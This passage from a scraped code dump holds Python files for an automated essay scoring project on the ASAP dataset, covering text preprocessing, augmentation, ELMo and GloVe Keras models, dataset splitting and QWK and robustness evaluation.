# in case of multiple runs of same epoch, pick one with the best QWK\n ep, qwk = tmp[tmp.argmax(axis=0)[-1]]\n except:\n raise Exception(\n 'Error: epoch {} of prompt {} not found in test'.format(best_ep[p], p))\n\n f.write('{}\\t{}\\t{}\\n'.format(best_ep[p], p, qwk))\n qwk_avg += qwk\n\n f.write('\\nRobustness per prompt\\n')\n r_avg = 0\n r_aug_avg = 0\n for p in prompts:\n robustness_df = pd.read_csv(os.path.join(\n path, 'robustness_{}_{}.csv'.format(p, best_ep[p])))\n r = (robustness_df['worse_resolved'] -\n robustness_df['better_resolved']).values[-1]\n f.write('{}\\t{}\\n'.format(p, r))\n r_avg += r\n\n r_aug = (robustness_df['worse_resolved'] -\n robustness_df['better_resolved']).values[:-2]/length[p]\n r_aug_avg += r_aug\n\n f.write('\\nRobustness per augment\\n')\n r_aug_avg /= 8\n for a, r in zip(robustness_df['augment'][:-2], r_aug_avg):\n f.write('{}\\t{}\\n'.format(a, r))\n\n f.write('\\n')\n f.write('QWK Average:\\t{}\\n'.format(qwk_avg / 8))\n f.write('Robustness Average:\\t{}\\n'.format(r_avg / 8))\n f.write('Robustness Average:\\t{}\\n'.format(r_aug_avg.mean()))\n print('summary generated!')\n\n\ndef QWK(y_true, y_pred):\n return cohen_kappa_score(y_true, y_pred, weights='quadratic')\n\n\ndef robustness(original, augment, original_int, augment_int, threshold=0.0):\n worse_raw = np.sum(original - augment > threshold)\n better_raw = np.sum(augment - original > threshold)\n worse_resolved = np.sum(original_int > augment_int)\n better_resolved = np.sum(original_int < augment_int)\n return worse_raw, better_raw, worse_resolved, better_resolved\n" }, { "alpha_fraction": 0.5233458280563354, "alphanum_fraction": 0.5354596376419067, "avg_line_length": 30.581113815307617, "blob_id": "136b7116f970b97ec3930cab8caf3a84d7d611d8", "content_id": "eb7e28524c4b487ff97e0e32a10506f02399ff9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13043, "license_type": "no_license", "max_line_length": 188, "num_lines": 413, "path": "/data_utils.py", "repo_name": "sunnypwang/aes", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nimport re\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nimport json\nimport collections\nfrom keras.preprocessing.sequence import pad_sequences\n\nimport os\n\nimport utils\n\naugment_set = ['no_art', 'no_conj', 'add_and-0.1', 'swap_word-0.05',\n 'no_first_sent', 'no_last_sent', 'no_longest_sent', 'reverse_sent']\n\n\nMAXLEN = [-1, 70, 88, 22, 23, 24, 20, 67, 97] # Max\n# MAXLEN = [-1, 47, 44, 14, 10, 15, 16, 32, 79] # 1.5IQR Max\nMAXWORDLEN = 50\n\nPAD_SENT_TOKEN = ''\n\nscore_range = [(-1, -1),\n (2, 12),\n (1, 6),\n (0, 3),\n (0, 3),\n (0, 4),\n (0, 4),\n (0, 30),\n (0, 60)]\n\n\ndef get_threshold(p):\n low, high = score_range[p]\n return 1/((high - low))\n\n\ndef rescale_to_int(raw, p):\n assert (raw >= 0.).all() and (raw <= 1.).all()\n low, high = score_range[p]\n return np.around(raw * (high - low) + low).astype(int)\n\n\ndef normalize_score(Y, p):\n low, high = score_range[p]\n Y = np.array(Y)\n Y_norm = (Y - low)/(high - low)\n assert (Y_norm >= 0.).all() and (Y_norm <= 1.).all()\n Y_resolved = rescale_to_int(Y_norm, p)\n try:\n assert np.equal(Y, Y_resolved).all()\n except AssertionError:\n for i in range(len(Y)):\n if Y[i] != Y_resolved[i]:\n print(i, Y[i], Y_resolved[i])\n print('use python3')\n return Y_norm\n\n\ndef clean_text(text):\n # Lowercase\n text = text.lower()\n # Remove quotation\n text = re.sub(r'\\\"', '', text)\n # URL replace by https://github.com/feidong1991/aes\n text = re.sub(\n '(http[s]?://)?((www)\\.)?([a-zA-Z0-9]+)\\.{1}((com)(\\.(cn))?|(org))', '<url>', text)\n # Truncate any duplicate non-alphanumeric and add a space after it\n # e.g. sent1.sent2!!!...??? becomes sent1. sent2! . ?\n text = re.sub(r'([^a-zA-Z0-9_@\\'\\s])\\1*', r'\\1 ', text)\n\n # Remove extra whitespaces\n text = re.sub(r'\\s+', ' ', text)\n\n return text\n\n\ndef tokenize(text):\n '''Word tokenize using NLTK word_tokenize'''\n tokens = word_tokenize(text)\n for index, token in enumerate(tokens):\n if token == '@' and (index+1) < len(tokens):\n tokens[index+1] = '@' + re.sub('[0-9]+.*', '', tokens[index+1])\n tokens.pop(index)\n return tokens\n\n\ndef sentenize(text):\n '''Sentence tokenize using NLTK sent_tokenize'''\n sents = sent_tokenize(text)\n return sents\n\n\ndef shorten_sentence(tokens):\n if len(tokens) <= MAXWORDLEN:\n return [tokens]\n\n # Step 1: split sentence based on keywords\n # split_keywords = ['because', 'but', 'so', 'then', 'You', 'He', 'She', 'We', 'It', 'They', 'Your', 'His', 'Her']\n split_keywords = ['because', 'but', 'so', 'then']\n k_indexes = [i for i, key in enumerate(tokens) if key in split_keywords]\n processed_tokens = []\n if not k_indexes:\n num = len(tokens) // MAXWORDLEN\n k_indexes = [(i+1)*MAXWORDLEN for i in range(num)]\n\n if len(tokens[:k_indexes[0]]) > 0:\n processed_tokens.append(tokens[:k_indexes[0]])\n len_k = len(k_indexes)\n for j in range(len_k-1):\n processed_tokens.append(tokens[k_indexes[j]:k_indexes[j+1]])\n processed_tokens.append(tokens[k_indexes[-1]:])\n\n # Step 2: split sentence to no more than MAXWORDLEN\n # if there are still sentences whose length exceeds MAXWORDLEN\n new_tokens = []\n for token in processed_tokens:\n if len(token) > MAXWORDLEN:\n num = len(token) // MAXWORDLEN\n s_indexes = [(i+1)*MAXWORDLEN for i in range(num)]\n len_s = len(s_indexes)\n if len(token[:s_indexes[0]]) > 0:\n new_tokens.append(token[0:s_indexes[0]])\n for j in range(len_s-1):\n new_tokens.append(token[s_indexes[j]:s_indexes[j+1]])\n new_tokens.append(token[s_indexes[-1]:])\n else:\n new_tokens.append(token)\n # print('before', len(tokens), 'after', [len(x) for x in new_tokens])\n return new_tokens\n\n\ndef load_glove_embedding(path, vocab, emb_dim=50):\n scale = np.sqrt(3.0 / emb_dim)\n emb_matrix = np.empty((len(vocab), emb_dim))\n emb_dict = {}\n with open(path, 'r', encoding='utf-8') as f:\n for line in f:\n args = line.split()\n word = args[0]\n vec = args[1:]\n emb_dict[word] = vec\n oov = 0\n for w in vocab:\n if w in emb_dict:\n emb = np.array(emb_dict[w])\n else:\n emb = np.random.uniform(-scale, scale, emb_dim)\n oov += 1\n emb_matrix[vocab[w]] = emb\n print('OOV: ', oov/len(vocab))\n del emb_dict\n return emb_matrix\n\n\ndef get_vocab(prompt, df=None, length=4000, features='essay'):\n vocab_path = utils.mkpath('vocab')\n file_path = os.path.join(vocab_path, '{}.vocab'.format(prompt))\n if os.path.isfile(file_path):\n with open(file_path, 'r') as f:\n vocab = json.load(f)\n assert type(vocab) == dict\n print('load vocab from {}'.format(file_path))\n return vocab\n\n word_all = []\n for essay in df[features]:\n sents = sentenize(essay)\n for sent in sents:\n words = tokenize(sent)\n word_all.extend(words)\n print('word count:', len(word_all))\n print('unique word count:', len(set(word_all)))\n\n most_common = collections.Counter(word_all).most_common(length - 3)\n\n vocab = {'<pad>': 0, '<unk>': 1, '<num>': 2}\n for w, c in most_common:\n vocab[w] = len(vocab)\n\n # save as JSON\n with open(file_path, 'w') as f:\n json.dump(vocab, f)\n print('save vocab to {}'.format(file_path))\n\n return vocab\n\n\n# def compute_maxsen(df, prompt):\n# maxx = 0\n# for essay in df['essay']:s\n# if MAX_LEN[prompt] < len(essay):\n# MAX_LEN[prompt] = len(essay)\n\ndef word2idx(w, vocab):\n if not w in vocab:\n return vocab['<unk>']\n return vocab[w]\n\n\ndef prepare_glove_features(df, prompt, vocab=None, features='essay', labels='domain1_score', x_only=False, pad=True, split_long_sent=True, y_only=False, norm=True, augment=None, rnd=None):\n assert not (x_only and y_only)\n if not y_only:\n X = np.zeros((len(df), MAXLEN[prompt], MAXWORDLEN), dtype=int)\n if not vocab:\n vocab = get_vocab(prompt, df)\n for i, essay in enumerate(df[features]):\n sents = sentenize(essay)\n if augment:\n sents = make_augment(sents, augment, rnd)\n sent_idxs = []\n for sent in sents:\n words = tokenize(sent)\n if split_long_sent:\n split_list = shorten_sentence(words)\n for word_tokens in split_list:\n sent_idxs.append([word2idx(w, vocab)\n for w in word_tokens])\n else:\n sent_idxs.append([word2idx(w, vocab) for w in words])\n\n if pad:\n sent_idxs = pad_sequences(\n sent_idxs, maxlen=MAXWORDLEN, dtype=object, padding='post', truncating='post', value=0)\n # print(sent_idxs.shape == X[i, :len(sent_idxs)].shape)\n X[i, :len(sent_idxs)] = sent_idxs\n if x_only:\n return X\n if not x_only:\n Y = np.array(df[labels].tolist())\n if norm:\n Y = normalize_score(Y, prompt)\n if y_only:\n return Y\n return X, Y\n\n\ndef prepare_elmo_features(df, prompt, vocab=None, features='essay', labels='domain1_score', x_only=False, pad=True, y_only=False, norm=True, augment=None, rnd=None):\n assert not (x_only and y_only)\n if not y_only:\n X = []\n # Sentence tokenize and make augment\n for essay in df[features]:\n sents = sentenize(essay)\n if augment:\n X.append(make_augment(sents, augment, rnd))\n else:\n X.append(sents)\n X = np.array(X)\n if pad:\n X = pad_sequences(X, maxlen=MAXLEN[prompt], dtype=object,\n padding='post', truncating='post', value=PAD_SENT_TOKEN)[:, :, None]\n if x_only:\n return X\n if not x_only:\n Y = np.array(df[labels].tolist())\n\n if norm:\n Y = normalize_score(Y, prompt)\n\n if y_only:\n return Y\n\n return X, Y\n\n\ndef load_data(prompt, suffix=None, fold=1):\n if suffix:\n data = pd.read_csv(\n 'asap/fold_{}/prompt_{}_{}.tsv'.format(fold, prompt, suffix), sep='\\t')\n else:\n data = pd.read_csv(\n 'asap/fold_{}/prompt_{}.tsv'.format(fold, prompt), sep='\\t')\n return data\n\n\ndef load_elmo_features(prompt, suffix=None, fold=1, **kwargs):\n data = load_data(prompt, suffix, fold)\n return prepare_elmo_features(\n data, prompt, **kwargs)\n\n\ndef prepare_features(model_name, **kwargs):\n if model_name.startswith('elmo'):\n return prepare_elmo_features(**kwargs)\n elif model_name.startswith('glove'):\n return prepare_glove_features(**kwargs)\n\n\ndef gen(model_name, prompt, df, vocab=None, batch_size=1, test=False, shuffle=True, **kwargs):\n data = df.copy()\n while True:\n if shuffle:\n data = data.sample(frac=1).reset_index(drop=True)\n for i in range(0, len(data), batch_size):\n j = min(len(data), i+batch_size)\n if test:\n x = prepare_features(model_name,\n df=data[i:j], prompt=prompt, vocab=vocab, x_only=True, **kwargs)\n yield x\n else:\n x, y = prepare_features(model_name,\n df=data[i:j], prompt=prompt, vocab=vocab, **kwargs)\n yield x, y\n\n\ndef elmo_gen(prompt, df, batch_size=1, test=False, shuffle=True, **kwargs):\n data = df.copy()\n while True:\n if shuffle:\n data = data.sample(frac=1).reset_index(drop=True)\n for i in range(0, len(data), batch_size):\n j = min(len(data), i+batch_size)\n if test:\n x = prepare_elmo_features(\n data[i:j], prompt, x_only=True, **kwargs)\n yield x\n else:\n x, y = prepare_elmo_features(data[i:j], prompt, **kwargs)\n yield x, y\n\n\ndef augment_gen(model_name, prompt, test_df, vocab=None, batch_size=1, augment=None, **kwargs):\n data = test_df.copy()\n rnd = np.random.RandomState(1)\n while True:\n for i in range(0, len(data), batch_size):\n j = min(len(data), i+batch_size)\n\n x = prepare_features(model_name,\n df=data[i:j], prompt=prompt, vocab=vocab, x_only=True, augment=augment, rnd=rnd, **kwargs)\n yield x\n\n\ndef make_augment(sents, augment, rnd=None):\n '''augment essay (list of sentences)'''\n assert augment in augment_set\n t = augment.split('-')\n if len(t) > 1:\n augment, threshold = t[0], float(t[1])\n else:\n threshold = 1.0\n\n new_sents = []\n if not rnd:\n rnd = np.random.RandomState(1)\n\n if augment == 'no_art':\n for sent in sents:\n new_sents.append(re.sub(r'\\b(a|an|the)\\b ', r'', sent))\n\n elif augment == 'no_conj':\n for sent in sents:\n new_sents.append(re.sub(r'\\b(and|or|but)\\b ', r'', sent))\n\n elif augment == 'add_and':\n for sent in sents:\n state = rnd.rand()\n if state < threshold:\n sent = 'and ' + sent\n new_sents.append(sent)\n\n elif augment == 'swap_word':\n for sent in sents:\n words = sent.split()\n word_idx = np.arange(len(words)-2)\n rnd.shuffle(word_idx)\n for i in word_idx:\n state = rnd.rand()\n if state < threshold:\n words[i], words[i+1] = words[i+1], words[i]\n new_sents.append(' '.join(words))\n\n elif augment == 'no_first_sent':\n if len(sents) > 1:\n new_sents.extend(sents[1:])\n else:\n new_sents.extend(['.'])\n\n elif augment == 'no_last_sent':\n if len(sents) > 1:\n new_sents.extend(sents[:-1])\n else:\n new_sents.extend(['.'])\n\n elif augment == 'no_longest_sent':\n if len(sents) > 1:\n maxidx = np.argmax([len(sent) for sent in sents])\n new_sents.extend(sents[:maxidx] + sents[maxidx+1:])\n else:\n new_sents.extend(['.'])\n\n elif augment == 'reverse_sent':\n new_sents.extend(sents[::-1])\n\n else:\n raise NameError('Unknown augment : ' + str(augment))\n assert type(new_sents) is list\n return new_sents\n\n# def load_data(prompt_id, fold_id, suffix):\n# path = 'prompt_{}/new/fold_{}/prompt_{}_{}.tsv'.format(\n# prompt_id, fold_id, prompt_id, suffix)\n# df = pd.read_csv(path, sep='\\t')\n# return df\n\n\ndef clean_data(df):\n new_df = []\n for essay in df:\n new_df.append(clean_text(essay))\n return new_df\n" }, { "alpha_fraction": 0.5188062191009521, "alphanum_fraction": 0.5282093286514282, "avg_line_length": 39.09836196899414, "blob_id": "0bd06729c81021a6ce30b9ec2bd5069b752b482b", "content_id": "ed8bfcd9ce345d237c1215b88a01791e2869fb42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2446, "license_type": "no_license", "max_line_length": 87, "num_lines": 61, "path": "/create_dataset.py", "repo_name": "sunnypwang/aes", "src_encoding": "UTF-8", "text": "import pandas as pd\nfrom unidecode import unidecode\nfrom sklearn.model_selection import KFold, train_test_split\n\nfrom data_utils import clean_data\nimport utils\n\n\ndef convert_to_ascii(df):\n new_df = []\n for essay in df:\n new_df.append(unidecode(essay))\n return new_df\n\n\ndef create_dataset(fold=True):\n '''Run this function once to create train,val,test files for K folds'''\n data_all = pd.read_csv('asap/training_set_rel3.fixed.tsv.zip',\n sep='\\t', encoding='latin1')\n data_all['essay'] = convert_to_ascii(data_all['essay'])\n data_all['essay'] = clean_data(data_all['essay'])\n\n for p in range(1, 9):\n data_prompt = data_all[data_all['essay_set']\n == p].reset_index(drop=True)\n print(data_prompt.head())\n\n if fold:\n kf = KFold(n_splits=5, shuffle=True, random_state=420)\n n = 1\n for train_index, test_index in kf.split(data_prompt):\n # print(\"TRAIN:\", train_index[:10], \"TEST:\", test_index[:10])\n val_index = test_index[:len(test_index)//2]\n test_index = test_index[len(test_index)//2:]\n print(len(train_index), len(val_index), len(test_index))\n\n fold_path = utils.mkpath('asap/fold_{}/'.format(n))\n data_prompt.loc[train_index].to_csv(\n fold_path + 'prompt_{}_train.tsv'.format(p), sep='\\t', index=False)\n data_prompt.loc[val_index].to_csv(\n fold_path + 'prompt_{}_val.tsv'.format(p), sep='\\t', index=False)\n data_prompt.loc[test_index].to_csv(\n fold_path + 'prompt_{}_test.tsv'.format(p), sep='\\t', index=False)\n n += 1\n else:\n train, test = train_test_split(\n data_prompt, test_size=0.2, random_state=420, shuffle=False)\n val = test[:len(test)//2]\n test = test[len(test)//2:]\n path = utils.mkpath('asap/')\n print(len(train), len(val), len(test))\n train.to_csv(path + 'prompt_{}_train.tsv'.format(p),\n sep='\\t', index=False)\n val.to_csv(path + 'prompt_{}_val.tsv'.format(p),\n sep='\\t', index=False)\n test.to_csv(path + 'prompt_{}_test.tsv'.format(p),\n sep='\\t', index=False)\n\n\nif __name__ == \"__main__\":\n create_dataset(fold=True)\n" }, { "alpha_fraction": 0.6088483333587646, "alphanum_fraction": 0.619983971118927, "avg_line_length": 36.61509323120117, "blob_id": "79719bc5fb1f1737dd2cac43f5d42a177d45ff59", "content_id": "45dc89c951047adf7925c67427d8aa3e8ebc6174", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9968, "license_type": "no_license", "max_line_length": 134, "num_lines": 265, "path": "/models.py", "repo_name": "sunnypwang/aes", "src_encoding": "UTF-8", "text": "import numpy as np\nimport tensorflow_hub as hub\nimport tensorflow as tf\nfrom keras import backend as K\nfrom keras.models import Model, model_from_yaml\nfrom keras.layers import *\nfrom keras.activations import softmax\nfrom keras.initializers import Constant\nfrom data_utils import PAD_SENT_TOKEN\nfrom data_utils import MAXLEN, MAXWORDLEN\n\n\nclass ElmoEmbeddingLayer(Layer):\n # ElmoEmbeddingLayer based on https://github.com/strongio/keras-elmo/blob/master/Elmo%20Keras.ipynb\n def __init__(self, maxlen, **kwargs):\n self.dimensions = 1024\n self.trainable = True\n self.maxlen = maxlen\n super(ElmoEmbeddingLayer, self).__init__(**kwargs)\n\n def build(self, input_shape):\n self.elmo = hub.Module('https://tfhub.dev/google/elmo/3', trainable=self.trainable,\n name=\"{}_module\".format(self.name))\n\n self.trainable_weights += tf.trainable_variables(\n scope=\"^{}_module/.*\".format(self.name))\n super(ElmoEmbeddingLayer, self).build(input_shape)\n\n def compute_elmo(self, x):\n\n msk = K.not_equal(x, PAD_SENT_TOKEN) # (maxlen,)\n x = tf.boolean_mask(x, msk) # (?, )\n emb = self.elmo(x,\n as_dict=False,\n signature='default')\n emb.set_shape((None, 1024)) # (?, 1024)\n s = tf.shape(emb)\n paddings = [[0, self.maxlen - s[0]], [0, 0]]\n # paddings = tf.Print(paddings, [paddings], '--- padding : ')\n pad = tf.pad(emb, paddings, 'CONSTANT', constant_values=0.)\n pad = tf.ensure_shape(pad, (self.maxlen, 1024)) # (maxlen, 1024)\n return pad\n\n def call(self, inputs, mask=None):\n print(inputs.shape)\n sqz_inputs = tf.squeeze(K.cast(inputs, tf.string), axis=2)\n embs = tf.map_fn(self.compute_elmo, sqz_inputs, dtype=tf.float32)\n return embs\n\n def compute_output_shape(self, input_shape):\n return (input_shape[0], input_shape[1], self.dimensions)\n\n\ndef softmax_wrapper(x):\n return softmax(x, axis=1)\n\n\ndef sum_attention(x):\n return K.sum(x, axis=1)\n\n\ndef permute(x):\n return tf.transpose(x, perm=[1, 0, 2])\n\n\ndef build_elmo_model_full(prompt, elmo_trainable=False, only_elmo=False, use_mask=True, lstm_units=100, drop_rate=None, summary=True):\n maxlen = MAXLEN[prompt]\n elmo = ElmoEmbeddingLayer(maxlen, trainable=elmo_trainable)\n\n input_text = Input(shape=(maxlen, 1), dtype=tf.string)\n embedding = elmo(input_text)\n if drop_rate > 0.:\n embedding = Dropout(drop_rate)(embedding)\n if use_mask:\n embedding = Masking(mask_value=0.0)(embedding)\n if not only_elmo:\n H = LSTM(lstm_units, return_sequences=True, name='lstm')(embedding)\n A_hat = Dense(lstm_units, activation='tanh', name='Attention_mat')(H)\n a = Dense(1, use_bias=False, activation=softmax_wrapper,\n name='Attention_vec')(A_hat)\n o = Dot(1, name='')([a, H])\n o = Flatten()(o)\n score = Dense(1, activation='sigmoid', name='sigmoid')(o)\n model = Model(inputs=input_text, outputs=score)\n else:\n model = Model(inputs=input_text, outputs=embedding)\n model.compile(loss='mse', optimizer='adam')\n if summary:\n model.summary()\n return model\n\n\ndef build_elmo_model(input_shape_tuple, dropout, lstm_units):\n\n inputs = Input(\n shape=(input_shape_tuple[0], input_shape_tuple[1]), name='inputs')\n input_dropout = Dropout(dropout, name='dropout')(inputs)\n H = LSTM(lstm_units, return_sequences=True, name='lstm')(input_dropout)\n A_hat = Dense(lstm_units, activation='tanh', name='Attention_mat')(H)\n a = Dense(1, use_bias=False, activation=softmax_wrapper,\n name='Attention_vec')(A_hat)\n o = Dot(1, name='')([a, H])\n o = Flatten()(o)\n score = Dense(1, activation='sigmoid', name='sigmoid')(o)\n model = Model(inputs=inputs, outputs=score)\n model.compile(loss='mse', optimizer='rmsprop')\n return model\n\n\ndef build_elmo_model_old(input_shape_tuple, dropout, lstm_units):\n inputs = Input(\n shape=(input_shape_tuple[0], input_shape_tuple[1]), name='inputs')\n dropout = Dropout(dropout, name='dropout')(inputs)\n lstm = LSTM(lstm_units, return_sequences=True, name='lstm')(dropout)\n A = Dense(lstm_units, activation='tanh', name='Attention_mat')(lstm)\n alpha = Dense(1, use_bias=False, activation=None, name='Attention_vec')(A)\n alpha = Reshape((input_shape_tuple[0],))(alpha)\n alpha = Activation('softmax')(alpha)\n alpha_re = RepeatVector(lstm_units)(alpha)\n alpha_perm = Permute((2, 1))(alpha_re)\n attention_mul = Multiply()([lstm, alpha_perm])\n out = Lambda(sum_attention, output_shape=None)(attention_mul)\n out = Dense(1, activation='sigmoid', name='sigmoid')(out)\n model = Model(inputs=inputs, outputs=out)\n model.compile(loss='mse', optimizer='rmsprop')\n return model\n\n\ndef get_layer_out(model, layer_index, data):\n intermediate_model = Model(inputs=model.input,\n outputs=model.get_layer(index=layer_index).output)\n layer_out = intermediate_model.predict(data)\n return layer_out\n\n\ndef get_intermediate_outputs(model, data, layer_indices, layer_names):\n outputs = dict()\n # layer_indices = [2,3,4,6,11]\n # layer_names = ['lstm','AttW','AttV','softmax','out']\n # layer_indices = [2, 6, 11]\n # layer_names = ['lstm', 'softmax', 'out']\n for i in range(len(layer_indices)):\n layer_out = get_layer_out(model, layer_indices[i], data)\n outputs[layer_names[i]] = layer_out\n del layer_out\n return outputs\n\n\ndef get_model(prompt, fold, show_summary=False):\n tf.clear_session()\n yaml_string = open(\n 'architecture/elmo_lstm_fix_data_prompt_{}.yml'.format(prompt), 'r').read()\n model = model_from_yaml(yaml_string)\n model.load_weights(\n 'weight/elmo_lstm_fix_data_prompt_{}_fold_{}.BEST.h5'.format(prompt, fold))\n if show_summary:\n model.summary()\n return model\n\n\ndef build_glove_model(prompt, vocab_size, emb_matrix, glove_trainable=False, drop_rate=None, maxwords=50, emb_dim=50, summary=True):\n maxlen = MAXLEN[prompt]\n maxwords = MAXWORDLEN\n input_word = Input(shape=(maxlen, maxwords,), dtype='int32')\n x = Reshape((maxlen * maxwords,))(input_word)\n emb = Embedding(input_dim=vocab_size, output_dim=emb_dim, weights=[emb_matrix],\n trainable=glove_trainable, mask_zero=True, name='glove')(x)\n x = ZeroMaskedEntries()(emb)\n x = Dropout(drop_rate)(x)\n x = Reshape((maxlen, maxwords, emb_dim))(x)\n x = TimeDistributed(Convolution1D(\n filters=100, kernel_size=5, padding='valid'), name='zcnn')(x)\n x = TimeDistributed(FeiDongAttention(), name='avg_zcnn')(x)\n\n x = LSTM(units=100, return_sequences=True, name='hz_lstm')(x)\n x = FeiDongAttention(name='avg_hz_lstm')(x)\n score = Dense(1, activation='sigmoid',\n name='output')(x)\n model = Model(input_word, score)\n model.compile(loss='mse', optimizer='rmsprop')\n if summary:\n model.summary()\n return model\n\n\nclass ZeroMaskedEntries(Layer):\n \"\"\"\n This layer is called after an Embedding layer.\n It zeros out all of the masked-out embeddings.\n It also swallows the mask without passing it on.\n You can change this to default pass-on behavior as follows:\n\n def compute_mask(self, x, mask=None):\n if not self.mask_zero:\n return None\n else:\n return K.not_equal(x, 0)\n \"\"\"\n\n def __init__(self, **kwargs):\n self.support_mask = True\n super(ZeroMaskedEntries, self).__init__(**kwargs)\n\n def build(self, input_shape):\n self.output_dim = input_shape[1]\n self.repeat_dim = input_shape[2]\n\n def call(self, x, mask=None):\n mask = K.cast(mask, 'float32')\n mask = K.repeat(mask, self.repeat_dim)\n mask = K.permute_dimensions(mask, (0, 2, 1))\n return x * mask\n\n def compute_mask(self, input_shape, input_mask=None):\n return None\n\n\nclass FeiDongAttention(Layer):\n def __init__(self, op='attsum', activation='tanh', init_stdev=0.01, return_attention=False, **kwargs):\n self.supports_masking = True\n self.op = op\n self.activation = activation\n self.init_stdev = init_stdev\n self.return_attention = return_attention\n super(FeiDongAttention, self).__init__(**kwargs)\n\n def build(self, input_shape):\n init_val_v = (np.random.randn(\n input_shape[2]) * self.init_stdev).astype(K.floatx())\n self.att_v = K.variable(init_val_v, name='att_v')\n init_val_W = (np.random.randn(\n input_shape[2], input_shape[2]) * self.init_stdev).astype(K.floatx())\n self.att_W = K.variable(init_val_W, name='att_W')\n self.trainable_weights = [self.att_v, self.att_W]\n\n def call(self, x, mask=None):\n y = K.dot(x, self.att_W)\n weights = tf.tensordot(self.att_v, K.tanh(y), axes=[0, 2])\n weights = K.softmax(weights)\n\n out = x * \\\n K.permute_dimensions(K.repeat(weights, x.shape[2]), [0, 2, 1])\n # print(out.shape)\n out_sum = K.sum(out, axis=1, keepdims=False)\n print(out_sum.shape)\n out_sum = K.cast(out_sum, K.floatx())\n if self.return_attention:\n return weights\n else:\n return out_sum\n\n def compute_output_shape(self, input_shape):\n if self.return_attention:\n return (input_shape[0], input_shape[1])\n else:\n return (input_shape[0], input_shape[2])\n\n def compute_mask(self, x, mask):\n return None\n\n # def get_config(self):\n # config = {'op': self.op, 'activation': self.activation,\n # 'init_stdev': self.init_stdev, 'return_attention': self.return_attention}\n # base_config = super(FeiDongAttention, self).get_config()\n # return dict(list(base_config.items()) + list(config.items()))\n" }, { "alpha_fraction": 0.6113123297691345, "alphanum_fraction": 0.6177208423614502, "avg_line_length": 32.23147964477539, "blob_id": "928f74d178fdf32d0295819e5f77ff03948b7dc8", "content_id": "e36135a29bec5c81a86e12411d0a537ea59ab289", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3589, "license_type": "no_license", "max_line_length": 115, "num_lines": 108, "path": "/test.py", "repo_name": "sunnypwang/aes", "src_encoding": "UTF-8", "text": "import sys\nimport argparse\n\nimport os\nimport numpy as np\nfrom keras import backend as K\nfrom keras.callbacks import *\n\nimport utils\nimport data_utils\nimport eval_utils\nimport models\n\nparser = argparse.ArgumentParser()\nparser.add_argument('prompt', type=int, help='-1 for all prompts')\nparser.add_argument('epoch', type=int)\nparser.add_argument('name', type=str, help='model name for path handling')\nparser.add_argument('--bs', type=int, default=5)\nparser.add_argument('--fold', type=int, default=1)\nparser.add_argument('--ft', action='store_true',\n help='enable fine-tuning')\nparser.add_argument('--re', type=int, default=100,\n help='recurrent size (elmo)')\nparser.add_argument('--drop', type=float, default=0.5,\n help='dropout')\nparser.add_argument('--mask', action='store_true')\nparser.add_argument('--augment', type=bool, default=True,\n help='include augment during testing')\nargs = parser.parse_args()\n\nprompts = [args.prompt]\nif args.prompt == -1:\n prompts = [1, 2, 3, 4, 5, 6, 7, 8]\n\nEPOCH = args.epoch\nBATCH_SIZE = args.bs\nMODEL_NAME = args.name\n\nprint(args)\nprint('ALL PROMPTS :', prompts)\nprint('BATCH SIZE :', BATCH_SIZE)\nprint('MODEL_NAME :', MODEL_NAME)\nprint('EPOCH :', EPOCH)\nprint('-------')\n\nfor p in prompts:\n print('PROMPT :', p)\n\n weight_path = utils.mkpath('weight/{}/{}'.format(MODEL_NAME, p))\n weight = utils.get_weight_at_epoch(weight_path, EPOCH)\n if not weight:\n print('weight not found')\n continue\n\n test_df = data_utils.load_data(p, 'test')\n\n print(test_df.shape)\n\n K.clear_session()\n if MODEL_NAME.startswith('elmo'):\n vocab = None\n model = models.build_elmo_model_full(\n p, elmo_trainable=args.ft, use_mask=args.mask, lstm_units=args.re, drop_rate=args.drop, summary=False)\n elif MODEL_NAME.startswith('glove'):\n vocab = data_utils.get_vocab(p)\n glove_path = 'glove/glove.6B.50d.txt'\n emb_matrix = data_utils.load_glove_embedding(glove_path, vocab)\n model = models.build_glove_model(\n p, len(vocab), emb_matrix, glove_trainable=args.ft, drop_rate=args.drop, summary=False)\n\n print('Loading weight :', weight)\n model.load_weights(weight)\n\n test_gen = data_utils.gen(MODEL_NAME,\n p, test_df, vocab, batch_size=BATCH_SIZE, test=True, shuffle=False)\n\n test_steps = np.ceil(len(test_df) / BATCH_SIZE)\n\n print(test_gen, test_steps)\n\n y_true = data_utils.prepare_features(MODEL_NAME,\n df=test_df, prompt=p, vocab=vocab, y_only=True, norm=True)\n\n y_pred = model.predict_generator(\n test_gen, steps=test_steps, verbose=1)\n\n eval_utils.generate_qwk(p, MODEL_NAME, y_true,\n y_pred, EPOCH, suffix='test')\n\n if args.augment:\n print('Predicting on augment sets...')\n aug_pred = {}\n for augment in data_utils.augment_set:\n aug_gen = data_utils.augment_gen(MODEL_NAME,\n p, test_df, vocab=vocab, batch_size=BATCH_SIZE, augment=augment)\n aug_steps = np.ceil(len(test_df) / BATCH_SIZE)\n\n aug_pred[augment] = model.predict_generator(\n aug_gen, steps=aug_steps, verbose=1)\n\n eval_utils.generate_score(\n p, MODEL_NAME, EPOCH, y_true, y_pred, aug_pred, test_df)\n\n eval_utils.generate_robustness(\n p, MODEL_NAME, EPOCH, y_true, y_pred, aug_pred)\n\nif len(prompts) == 8:\n eval_utils.generate_summary(MODEL_NAME, EPOCH)\n" }, { "alpha_fraction": 0.62806636095047, "alphanum_fraction": 0.6334776282310486, "avg_line_length": 29.130434036254883, "blob_id": "b042f0ac052693f2c4fc3ef71ad308542736b3b3", "content_id": "74d919e23e71a23d84c62266752ba5bb1b975b84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2772, "license_type": "no_license", "max_line_length": 74, "num_lines": 92, "path": "/elmo_test.py", "repo_name": "sunnypwang/aes", "src_encoding": "UTF-8", "text": "import sys\nimport argparse\nfrom keras.callbacks import *\nimport os\nimport numpy as np\n\nimport utils\nimport data_utils\nimport eval_utils\nimport models\n\nparser = argparse.ArgumentParser()\nparser.add_argument('prompt', type=int, help='-1 for all prompts')\nparser.add_argument('epoch', type=int)\nparser.add_argument('name', type=str, help='model name for path 